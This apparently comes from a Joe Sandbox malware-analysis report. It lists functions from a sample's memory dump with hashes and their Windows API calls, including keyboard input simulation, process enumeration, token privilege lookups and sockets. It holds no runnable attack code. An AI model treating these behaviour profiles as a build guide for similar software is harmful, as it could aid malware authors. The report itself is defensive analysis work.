Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
Instruction ID: cb24bacaf032ce2f4eec77006387ddcb3c7c513050a415d168a9e233a9d40d34
Opcode Fuzzy Hash: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
Instruction Fuzzy Hash: 01C14A75A0020AEFDB15CF94C894BAEB7B5FF48324F108698E505EB291D735DE41DB90

Function 0072342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00723459
CoUninitialize.OLE32 ref: 00723463
VariantInit.OLEAUT32(?), ref: 0072346E
VariantClear.OLEAUT32(?), ref: 0072371B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
Instruction ID: 998ca5ac682de1fcaa4ad5896f682f1a46ec29df3e7659360874404d48ce2718
Opcode Fuzzy Hash: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
Instruction Fuzzy Hash: CBA14B756042109FC700EF28D885A2AB7E5FF89714F04885DF98A9B362DB38EE41CF95

Function 00700436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 007005F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 00700608
CLSIDFromProgID.OLE32(?,?,00000000,0073CC40,000000FF,?,00000000,00000800,00000000,?,0073FC08,?), ref: 0070062D
_memcmp.LIBVCRUNTIME ref: 0070064E

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 4d1464635aeecad16aad7b3d3dcc6b95a920776876e3c8f2ad49f66182b9c1e0
Instruction ID: c1b7f75451e72aa6405368a140206537be626715736f07a76c6b3ac841f88fb2
Opcode Fuzzy Hash: 4d1464635aeecad16aad7b3d3dcc6b95a920776876e3c8f2ad49f66182b9c1e0
Instruction Fuzzy Hash: 2581FC75A00109EFCB04DF94C984EEEB7F9FF89315F204558E506AB291DB75AE06CBA0

Function 006E1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006E14C0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4a15ddf5335cf03118919905a59ca73b6bca1f92010db54c2074e107fb8336b6
Instruction ID: 899d48b519e8e75515011c4a36ecfd4b3eed6ebf16c735a13822f1465409d676
Opcode Fuzzy Hash: 4a15ddf5335cf03118919905a59ca73b6bca1f92010db54c2074e107fb8336b6
Instruction Fuzzy Hash: 2A41F971A01751DBDB216BFA8C45ABE3AE7EF43330F14422EF415DA3D2E6344941B265

Function 00736278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0165F7C8,?), ref: 007362E2
ScreenToClient.USER32(?,?), ref: 00736315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00736382

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
Instruction ID: a101ca1d91636d884a4cd857d2b7ee0498b78238d46cbfad2bb8c3c59bf0dd46
Opcode Fuzzy Hash: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
Instruction Fuzzy Hash: CA512875A00249EFEF10DF68D880AAE7BB6FB45360F108169F9159B2A1D734ED81CB50

Function 00721AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00721AFD
WSAGetLastError.WSOCK32 ref: 00721B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00721B8A
WSAGetLastError.WSOCK32 ref: 00721B94

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
Instruction ID: 22d4808ad67bff98c2dfc6a761b9f8c869a3e585618e4f92c1bc7d3e3c104822
Opcode Fuzzy Hash: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
Instruction Fuzzy Hash: 5841CE74600200AFE720AF20D886F6A77E6AB45718F54848CFA1A9F2D2D776ED418B94

Function 006DB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
Instruction ID: e657bfb4d8355866fda84097156fb4e2267f30b820b05b1564a4776081ec3f06
Opcode Fuzzy Hash: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
Instruction Fuzzy Hash: 8E41BE71E00344AFD7249F68C841BAABBEAEB88720F11452FF151DB386D771A9018794

Function 007156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00715783
GetLastError.KERNEL32(?,00000000), ref: 007157A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007157CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007157FA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
Instruction ID: 7b69130f704ea68f15aa0611b074ea60db8d8a24db4de6e1144ae4d855b624f7
Opcode Fuzzy Hash: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
Instruction Fuzzy Hash: 6941FD35600610DFCB15EF15C545A5EBBE2EF89720B19C488E84A6B3A2CB34FD41CF95

Function 006DD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,006C6D71,00000000,00000000,006C82D9,?,006C82D9,?,00000001,006C6D71,?,00000001,006C82D9,006C82D9), ref: 006DD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006DD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006DD9AB
__freea.LIBCMT ref: 006DD9B4

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
Instruction ID: 89a73124e8606ef12820abe0ea1de6d31874f63297d84aac9e6bf0b1feae20b3
Opcode Fuzzy Hash: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
Instruction Fuzzy Hash: E531A072E0021AABDB259F65DC91EEE7BA6EB40310B054169FC04DA390EB36DD51DB90

Function 007352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00735352
GetWindowLongW.USER32(?,000000F0), ref: 00735375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00735382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007353A8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
Instruction ID: 1e7222878f50704243715a23565a02fc2a5a8f67577f662ddea1028c55e660db
Opcode Fuzzy Hash: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
Instruction Fuzzy Hash: 2431C534A95A0CEFFB309F14CC06BE83765EB05398F584101FA10961E2C7BC9D80DB46

Function 0070AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0070ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0070AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0070AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0070ACC6

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
Instruction ID: ea1ed921546819bce06bc48b11cc64dc9aa43812754b01e73d6def0601fe5827
Opcode Fuzzy Hash: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
Instruction Fuzzy Hash: C931E130A04758FFFB25CB658C09BFF7BE6AB89310F05831AE485961D1D37D898587A2

Function 00737674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0073769A
GetWindowRect.USER32(?,?), ref: 00737710
PtInRect.USER32(?,?,00738B89), ref: 00737720
MessageBeep.USER32(00000000), ref: 0073778C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
Instruction ID: f7864ce93ab967b1cb4511743ddf6d6805f7c2815db6f2eb5bab507551c63fad
Opcode Fuzzy Hash: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
Instruction Fuzzy Hash: 2341C0B4605254EFEB25CF58C895FA977F4FF49350F5980A8E5149B262C338E942CF90

Function 007316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007316EB

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

GetCaretPos.USER32(?), ref: 007316FF
ClientToScreen.USER32(00000000,?), ref: 0073174C
GetForegroundWindow.USER32 ref: 00731752

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
Instruction ID: fec6c9fda4c5ca408ef7dd098c4d7876a296b129e8e12f43b028974c390da8a0
Opcode Fuzzy Hash: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
Instruction Fuzzy Hash: ED314171D00149AFD700EFA9C885CAEBBFDEF89304B5480A9E415E7252DB359E45CFA4

Function 0070D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
Process32NextW.KERNEL32(00000000,?), ref: 0070D52F
CloseHandle.KERNEL32(00000000), ref: 0070D5DC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 9e196fbaa336588afb67213b7981c2aed9ad3af9a680bd19d64987900aea3bf3
Instruction ID: 17459cf83d3dfdc8c4e5939f205efd14e9039bd210cd0e38999b055c7f14d320
Opcode Fuzzy Hash: 9e196fbaa336588afb67213b7981c2aed9ad3af9a680bd19d64987900aea3bf3
Instruction Fuzzy Hash: C631AF71008300DFD315EF94CC81AAFBBE9EF9A354F140A2DF581921A1EB759E45CBA2

Function 00738FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

GetCursorPos.USER32(?), ref: 00739001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006F7711,?,?,?,?,?), ref: 00739016
GetCursorPos.USER32(?), ref: 0073905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006F7711,?,?,?), ref: 00739094

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
Instruction ID: 78a230e9abb3d059965ba90498fe5a279fa2333dca14c2e7422b13f19352e374
Opcode Fuzzy Hash: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
Instruction Fuzzy Hash: 6B21E535600118EFEB2A8F94CC58EFA7BB9EF49350F148055F60557262C379AD90DF60

Function 0070D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0073CB68), ref: 0070D2FB
GetLastError.KERNEL32 ref: 0070D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0070D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0073CB68), ref: 0070D376

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
Instruction ID: 56eb907476ba225c1e1843c4611bf8d9b14e7ec5c71e496e1f430daf27627b88
Opcode Fuzzy Hash: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
Instruction Fuzzy Hash: 72215970508301DFC720EF68C88186AB7E4AA56364F104A1DF499932E1EB399D46CB97

Function 00701571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
Part of subcall function 00701014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
Part of subcall function 00701014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
Part of subcall function 00701014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007015BE
_memcmp.LIBVCRUNTIME ref: 007015E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00701617
HeapFree.KERNEL32(00000000), ref: 0070161E

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
Instruction ID: 5d5303642d2a52d68172994d89729c57e2f563e34c4970c63387177d934c1107
Opcode Fuzzy Hash: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
Instruction Fuzzy Hash: B1219A71E00108EFDB00DFA4CD45BEEB7F8EF40345F498559E441AB281EB39AA44DBA0

Function 00732782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0073280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00732840

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
Instruction ID: ba5e5ae3b2656262d3860de7ba73c19fa8f310f2e3a1178de20337305286c00e
Opcode Fuzzy Hash: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
Instruction Fuzzy Hash: AB21C131204121AFF7159B24C855FAA7B96AF85324F248158F4268B6E3CB79FC42CB90

